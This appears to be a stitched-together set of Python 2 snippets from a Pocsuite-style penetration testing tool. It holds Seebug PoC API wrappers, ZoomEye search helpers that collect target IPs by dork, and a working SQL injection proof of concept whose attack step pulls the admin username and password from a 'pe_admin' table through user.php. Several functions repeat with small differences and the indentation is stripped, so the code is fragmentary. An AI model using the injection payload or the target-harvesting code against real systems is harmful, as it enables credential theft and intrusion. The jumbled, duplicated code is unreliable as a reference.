def static(self):
req = requests.get('https://www.seebug.org/api/user/poc_list',
headers=self.headers)
self.stats = ast.literal_eval(req.content)
if 'detail' in self.stats:
return False
return 'According to record total %s PoC purchased' % len(self.stats)
def retrieve(self, ID):
req = requests.get('https://www.seebug.org/api/user/poc_detail?framework=2&id=%s' % ID, headers=self.headers, )
try:
ret = ast.literal_eval(req.content)
except:
ret = json.loads(req.content)
return ret
def seek(self, keyword):
req = requests.get(
'https://www.seebug.org/api/user/poc_list?q=%s' % keyword,
headers=self.headers,
)
self.pocs = ast.literal_eval(req.content)
return '%s purchased poc related to keyword "%s"' % (len(
self.pocs), keyword)
def resourceInfo(self):
req = requests.get('https://api.zoomeye.org/resources-info', headers=self.headers, )
content = json.loads(req.content)
if 'plan' in content:
self.plan = content['plan']
self.resources['search-limit'] = content['resources']['search']
return True
return False
def resourceInfo(self):
req = requests.get('http://api.zoomeye.org/resources-info', headers=self.headers, )
content = json.loads(req.content)
if 'plan' in content:
self.plan = content['plan']
self.resources['web-search'] = content['resources']['web-search']
self.resources['host-search'] = content['resources']['host-search']
return True
return False
def search(self, dork, page=1, resource='web'):
req = requests.get(
'http://api.zoomeye.org/{}/search?query="{}"&page={}&facet=app,os'.format(resource, urllib.quote(dork), page + 1),
headers=self.headers
)
content = json.loads(req.content)
if 'matches' in content:
return [match['ip'] for match in content['matches']]
else:
return []
def _verify(self):
if self.check_argv():
result = {}
payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(floor(rand(0)*2),md5(1))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23"
vulurl = urlparse.urljoin(self.url,'user.php' + payload)
resp = req.get(vulurl)
if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'user.php')
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _attack(self):
if self.check_argv():
result = {}
payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(char(45,45,45),admin_name,char(45,45,45),admin_pw,char(45,45,45))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23"
vulurl = urlparse.urljoin(self.url,'user.php' + payload)
resp = req.get(vulurl)
if resp.status_code == 200:
match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _executeVerify(pocInfo, targetJson, targetUrl, mode):
url, startTime = parseTargetUrl(targetUrl), time.time()
step, method, path, params, headers, match, status_code = initilizeJson(targetJson)
if (targetUrl + pocInfo['vulID']) not in resultJson:
resultJson[targetUrl + pocInfo['vulID']] = {}
resultJson[targetUrl + pocInfo['vulID']]['verifyInfo'] = {'URL': url, 'Postdata': params, 'Path': path}
try:
if method == 'get':
r = req.get('%s/%s' % (url, path), params=params, headers=headers)
else:
r = req.post('%s/%s' % (url, path), data=params, headers=headers)
except Exception, ex:
logger.log(CUSTOM_LOGGING.ERROR, str(ex))
return False
def _executeVerify(pocInfo, targetJson, targetUrl, mode):
url, startTime = parseTargetUrl(targetUrl), time.time()
step, method, path, params, headers, match, status_code = initilizeJson(targetJson)
if (targetUrl + pocInfo['vulID']) not in resultJson:
resultJson[targetUrl + pocInfo['vulID']] = {}
resultJson[targetUrl + pocInfo['vulID']]['verifyInfo'] = {'URL': url, 'Postdata': params, 'Path': path}
try:
if method == 'get':
r = req.get('%s/%s' % (url, path), params=params, headers=headers)
else:
r = req.post('%s/%s' % (url, path), data=params, headers=headers)
except Exception, ex:
logger.log(CUSTOM_LOGGING.ERROR, str(ex))
return False
def search(self, dork, page=1, resource='web'):
req = requests.get(
'https://api.zoomeye.org/{}/search?query={}&page={}&facet=app,os'.
format(resource, urllib.quote(dork), page + 1),
headers=self.headers)
content = json.loads(req.content)
if 'matches' in content:
if resource == 'web':
return [match['site'] for match in content['matches']]
else:
anslist = []
for match in content['matches']:
ans = match['ip']
if 'portinfo' in match:
ans += ':' + str(match['portinfo']['port'])
anslist.append(ans)
return anslist
else:
return []
def seek(self, keyword):
req = requests.get('https://www.seebug.org/api/user/poc_list?q=%s' % keyword, headers=self.headers, )
self.pocs = ast.literal_eval(req.content)
return '%s purchased poc related to keyword "%s"' % (len(self.pocs), keyword)
def static(self):
req = requests.get('https://www.seebug.org/api/user/poc_list', headers=self.headers, )
self.stats = ast.literal_eval(req.content)
if 'detail' in self.stats:
return False
return 'According to record total %s PoC purchased' % len(self.stats)
def retrieve(self, ID):
req = requests.get('https://www.seebug.org/api/user/poc_detail?id=%s' % ID, headers=self.headers, )
return ast.literal_eval(req.content)
